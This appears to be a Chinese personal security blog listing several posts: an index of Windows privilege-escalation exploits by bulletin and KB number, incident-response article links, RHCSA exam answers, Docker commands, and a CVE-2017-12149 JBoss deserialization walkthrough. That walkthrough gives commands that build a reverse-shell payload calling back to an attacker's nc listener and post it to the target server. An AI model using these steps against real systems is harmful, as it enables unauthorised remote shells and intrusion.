3Years - TotoroLMva 浪迹在上海的信息安全大学狗 我信仰的是信仰

05月 09

大牛总结的Window提权Exp合集

项目下载地址;https://github.com/SecWiki/windows-kernel-exploits
漏洞列表
 
#Security Bulletin   #KB     #Description    #Operating System
 
CVE-2017-0213  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008)
MS17-010  [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP)
MS16-135  [KB3199135]  [Windows Kernel Mode Drivers]  (2016)
MS16-098  [KB3178466]  [Kernel Driver]  (Win 8.1)
MS16-075  [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012)
MS16-032  [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012)
MS16-016  [KB3136041]  [WebDAV]  (2008/Vista/7)
MS15-097  [KB3089656]  [remote code execution]  (win8.1/2012)
MS15-076  [KB3067505]  [RPC]  (2003/2008/7/8/2012)
MS15-077  [KB3077657]  [ATM]  (XP/Vista/Win7/Win8/2000/2003/2008/2012)
MS15-061  [KB3057839]  [Kernel Driver]  (2003/2008/7/8/2012)
MS15-051  [KB3057191]  [Windows Kernel Mode Drivers]  (2003/2008/7/8/2012)
MS15-010  [KB3036220]  [Kernel Driver]  (2003/2008/7/8)
MS15-015  [KB3031432]  [Kernel Driver]  (Win7/8/8.1/2012/RT/2012 R2/2008 R2)
MS15-001  [KB3023266]  [Kernel Driver]  (2008/2012/7/8)
MS14-070  [KB2989935]  [Kernel Driver]  (2003)
MS14-068  [KB3011780]  [Domain Privilege Escalation]  (2003/2008/2012/7/8)
MS14-058  [KB3000061]  [Win32k.sys]  (2003/2008/2012/7/8)
MS14-040  [KB2975684]  [AFD Driver]  (2003/2008/2012/7/8)
MS14-002  [KB2914368]  [NDProxy]  (2003/XP)
MS13-053  [KB2850851]  [win32k.sys]  (XP/Vista/2003/2008/win 7)
MS13-046  [KB2840221]  [dxgkrnl.sys]  (Vista/2003/2008/2012/7)
MS13-005  [KB2778930]  [Kernel Mode Driver]  (2003/2008/2012/win7/8)
MS12-042  [KB2972621]  [Service Bus]  (2008/2012/win7)
MS12-020  [KB2671387]  [RDP]  (2003/2008/7/XP)
MS11-080  [KB2592799]  [AFD.sys]  (2003/XP)
MS11-062  [KB2566454]  [NDISTAPI]  (2003/XP)
MS11-046  [KB2503665]  [AFD.sys]  (2003/2008/7/XP)
MS11-011  [KB2393802]  [kernel Driver]  (2003/2008/7/XP/Vista)
MS10-092  [KB2305420]  [Task Scheduler]  (2008/7)
MS10-065  [KB2267960]  [FastCGI]  (IIS 5.1, 6.0, 7.0, and 7.5)
MS10-059  [KB982799]   [ACL-Churraskito]  (2008/7/Vista)
MS10-048  [KB2160329]  [win32k.sys]  (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)
MS10-015  [KB977165]   [KiTrap0D]  (2003/2008/7/XP)
MS09-050  [KB975517]   [Remote Code Execution]  (2008/Vista)
MS09-020  [KB970483]   [IIS 6.0]  (IIS 5.1 and 6.0)
MS09-012  [KB959454]   [Chimichurri]  (Vista/win7/2008/Vista)
MS08-068  [KB957097]   [Remote Code Execution]  (2000/XP)
MS08-067  [KB958644]   [Remote Code Execution]  (Windows 2000/XP/Server 2003/Vista/Server 2008)
MS08-025  [KB941693]   [Win32.sys]  (XP/2003/2008/Vista)
MS06-040  [KB921883]   [Remote Code Execution]  (2003/xp/2000)
MS05-039  [KB899588]   [PnP Service]  (Win 9X/ME/NT/2000/XP/2003)
MS03-026  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003)
04月 18

应急响应相关文章

1、黑客入侵应急分析手工排查

https://xianzhi.aliyun.com/forum/read/1655.html

 

2、Web日志安全分析浅谈

https://xianzhi.aliyun.com/forum/read/1723.html

 

3、应急响应分析技术讨论

https://threathunter.org/topic/5947750c2cc7eb8464e32bd3

 

4、某日应急响应小记

https://threathunter.org/topic/5943a99c1e3732874e23f996
12月 26

RHCSA题目

RHCSA 7

考试注意事项

1、考试分为上午RHCSA考试,下午RHCE考试 2、考试时间上午2.5小时,下午3.5个小时
3、总分都是300分,>=210成绩就算通过考试 4、准备签字笔、身份证 5、考试时要填写姓名(拼音)与邮箱,请注意保持一致
6、每人一台物理机,考试都是在虚拟机里面操作。物理机上有各种图标,来用操作虚拟机,比如重启,关机,重置等。
7、考试中如有不清楚请及时与考官联系

注意:

  1. 所有的光盘中的软件包考试的时候会给出
  2. 升级软件包所在目录也会给出
  3. 你可以用真实机来验证虚拟机中的考试实验是否正确完成
  4. 考题中出现的 X,是你宿主机的IP 地址主机位
  5. example.com 域所在的网络是192.168.0.0/24 cracker.com 域所在的网络是172.16.0.0/16,一般在题意中被要求拒绝的网络
  6. RHCSA 部分,在system1 主机上完成。RHCE 部分,在system1 和system2 上完成。考试前是进入不了虚拟机的,需要恢复其root密码,并设置好主机名、IP地址、掩码、网关、DNS服务器等。
  1. 恢复root密码
(1)按e编辑grub菜单 
(2)选择linux16那行,追加rd.break 
(3)ctrl+x引导 
(4)#mount  -o  remount,rw  /sysroot 
(5)#chroot  /sysroot 
(6)#passwd  root 
(8)    #touch  /.autorelabel
(8)#exit
(9)#exit
  1. 配置主机名,ip 地址,网关,DNS。主机名:serverX.example.com, IP:192.168.0.150+X/24,网关:192.168.0.254,DNS:192.168.0.254
    (X 是你的机器号)
hostnamectl  set-hostname  serverX.example.com
vim  /etc/sysconfig/network-scriptcs/ifcfg-eth0

配置为:

BOOTPROTO=none
IPADDR=192.168.0.150+X
NETMASK=255.255.255.
GATEWAY=192.168.0.254
DNS1=192.168.0.254
ONBOOT=yes
systemctl  restart  network 
vim  /etc/resolv.conf
nameserver  192.168.0.254
  1. SElinux 必须运行在Enforcing模式下。
vim  /etc/sysconfig/selinux
SELINUX=enforcing
Reboot
  1. 配置YUM源,使用地址http://classroom.example.com/rhel7/dvd作为默认的源

vim  /etc/yum.repos.d/rhel.repo

配置为:

[packages] 
name = packages
baseurl= http://classroom.example.com/rhel7/dvd
gpgcheck = 0
  1. 调整逻辑卷home的大小为300M,确保这个文件系统的内容仍然完整。注意:分区很少能精确到和要求的大小相同,因此在范围260M到320M之间都是可接受的
df  -hT            //查看到文件系统类型
lvresize  -L  300M  /dev/vgsrv/home
resize2fs  /dev/vgsrv/home        //ext4文件系统
xfs_growfs  /dev/vgsrv/home      //xfs文件系统
  1. 创建下面的用户、组和组成员关系: 名字为adminuser的组,用户natasha,使用adminuser作为附属组,用户harry,也使用adminuser作为附属组,用户sarah,在系统上不能访问可交互的shell,且不是adminuser的成员,natasha,harry,sarah密码都是redhat
groupadd  adminuser 
useradd  -G  adminuser  natasha 
useradd  -G  adminuser  harry 
useradd  -s  /sbin/nologin  sarah 
echo  "redhat" |passwd  --stdin  natasha         //或者用passwd命令改用户密码
echo  "redhat" |passwd  --stdin  harry 
echo  "redhat" |passwd  --stdin  sarah
  1. 复制文件/etc/fstab到/var/tmp/fstab,配置/var/tmp/fstab的权限如下: 文件/var/tmp/fstab所有者是root,文件/var/tmp/fstab属于root组, 文件/var/tmp/fstab不能被任何用户执行,用户natasha可读和可写/var/tmp/fstab,用户harry既不能读也不能写/var/tmp/fstab,所有其他用户(现在和将来)具有读/var/tmp/fstab的能力
cp  /etc/fstab  /var/tmp/ 
ls  -l  /var/tmp/fstab                     //查看文件的权限信息
setfacl  -m  u:natasha:rw  /var/tmp/fstab 
setfacl  -m  u:harry:-  /var/tmp/fstab
  1. 用户natasha必须配置一个cron job ,当地时间每天14:23运行,执行/bin/echo hiya
crontab  -e  -u  natasha 
23  14  *  *  *  /bin/echo  hiya
  1. 创建一个目录/home/admins,使之具体下面的特性:/home/admins所属组为adminuser这个目录对组adminuser的成员具有可读、可写和可执行,但是不是对其他用户。(root可以访问系统上所有的文件和目录)在/home/admins 下创建的任何文件所属组自动设置为adminuser
mkdir  /home/admins 
chgrp  adminuser  /home/admins 
chmod  2770  /home/admins 
ls  -ld  /home/admins                 //查看目录的权限信息
  1. http://classroom.example.com/rhel7/updates 安装合适的内核更新。下面的要求必须满足:更新的内核作为系统启动的默认内核,原来的内核在系统启动的时候仍然有效和可引导
vim  /etc/yum.repos.d/updates.repo

配置为

[updates]
name=updates
baseurl=http://classroom.example.com/rhel7/updates
gpgcheck=0
yum  update  kernel
reboot
  1. 系统classroom.example.com提供了一个LDAP证服务,你的系统应该按下面的要求绑定到这个服务:验证服务的基准DN是dc=example,dc=com,LDAP用于提供账号信息和验证信息链接应该使用位于:http://classroom.example.com/pub/example-ca.crt的证书加密当正确的配置后,IdapuserX可以登录你的系统,但没有家目录直到你完成autofs题目IdapuserX的密码是’password’
# yum  –y  install  sssd  authconfig-gtk  openldap-*  krb5-*
# authconfig-gtk 
 上午考试选择LDAP
 
#  su - ldapuserX
su: warning: cannot change directory to /home/guests/ldapuser1: No such file or directory 
mkdir: cannot create directory '/home/guests': Permission denied 
-bash-4.2$
  1. 配置你的系统使它是classroom.example.com的一个NTP客户
yum  –y  install  chrony 
vim  /etc/chrony.conf 
#server 0.rhel.pool.ntp.org iburst
#server 1.rhel.pool.ntp.org iburst
#server 2.rhel.pool.ntp.org iburst
#server 3.rhel.pool.ntp.org iburst
server  classroom.example.com  iburst 
systemctl  restart  chronyd 
systemctl  enable  chronyd 
chronyc  sources  -v
  1. 配置autofs自动挂载LDAP用户的家目录,如下要求: classroom.example.com使用NFS共享了/rhome给你的系统。这个文件系统包含了预先设置好的用户IdapuserX的家目录是classroom.example.com:/rhome/IdapuserX,IdapuserX的家目录应该自动挂载到本地/home/guests,下面的/home/guests/IdapuserX家目录必须对用户具有可写权限IdapuserX的密码是’password’
yum  install  autofs  -y 
vim  /etc/auto.master

配置为:

/home/guests  /etc/auto.misc
vim  /etc/auto.misc
*   -fstype=nfs,rw  192.168.0.254:/rhome/&
(或者写:ldapuser15      -fstype=nfs,rw  192.168.0.254:/rhome/ldapuser15)
systemctl  restart  autofs 
systemctl  enable  autofs 
su  -  ldapuserX
  1. 创建一个用户alex,uid为1234。这个用户的密码为redhat。
useradd  -u  1234  alex 
echo  redhat |passwd  --stdin  alex
  1. 为你的系统上额外添加一个大小为512M的交换分区,这个交换分区在系统启动的时候应该能自动挂载。不要移除和更改你系统上现存的交换分区。
fdisk  /dev/vda
partprobe 
mkswap  /dev/vda5
swapon  /dev/vda5
vim  /etc/fstab
/dev/vda5    swap    swap    defaults    0 0
  1. 找出所有者是natasha的文件,并把他们拷贝到/root/findfiles目录。
mkdir  /root/findfiles 
find  /  -user  natasha  -exec  cp  -rp  {}  /root/findfiles/  \;
  1. 在/usr/share/dict/linux.words中找出所有包含abrot的行。复制所有这些行并按照原来的顺序放在文件/root/grepfile.txt中。/root/grepfile.txt应该没有空白行,所有的行必须是原有行的精确复制。
grep  abrot  /usr/share/dict/linux.words  >  /root/grepfile.txt
  1. 创建名为/root/backupetc.tar.gz的备份文件,其中包含/etc的内容,tar必须使用gzip压缩。 bzip
tar  zcvf  /root/backupetc.tar.gz  /etc    tar jcvf  /root/backupetc.tar.bz2  /etc
  1. 按照下面的要求创建一个新的逻辑卷:逻辑卷命名为database,属于卷组datastore,且大小为20个PE。在卷组datastore的逻辑卷每个PE的大小为16M。使用ext3格式化这个新的逻辑卷.此逻辑卷在系统启动的时候应该能自动挂载到/mnt/database。
fdisk  /dev/vda
partprobe  
pvcreate  /dev/vda6
vgcreate  -s  16M  datastore  /dev/vda6     //如果创建错误,就删除VG:vgremove  /dev/datastore 删除 VG
lvcreate  -n  database  -l  20  datastore
lvdisplay  /dev/datastore/database 
mkfs.ext3  /dev/datastore/database 
mkdir   /mnt/database

vim  /etc/fstab
/dev/datastore/database    /mnt/database    ext3     defaults     0  0
mount   -a
df   -hT
11月 30

CVE-2017-12149 JBOSSAS6.X 反序列化漏洞

POC文件下载
URL后面拼接

/invoker/readonly/

来判断漏洞是否存在、如果报500便是存在。

步骤1:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

步骤2:

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port (nc监听IP及端口)

步骤3

curl http://xxxxx:81/invoker/readonly –data-binary @ReverseShellCommonsCollectionsHashMap.ser
11月 30

Docker常用命令

最近折腾了很久docker,中间学习到了不少,备注一些常用命令吧。
导入本地镜像

docker load -i /../../../../xxx.tar 

使用已有镜像启动容器

docker run --name XXX(启动后的容器名称)-p 0.0.0.0:8002(物理机端口):80(镜像端口) -d XXX(使用的镜像名称)

进入某个容器

docker exec -it XXX(容器ID) /bin/bash

查看容器端口

docker port XXX(容器ID)

查看所有容器

docker ps -a

删除容器

docker rm -f XXX(容器ID)

重启/关闭/启动容器

docker restart/stop/start XXX(容器ID)

搜索镜像

docker search XXX(搜索关键字)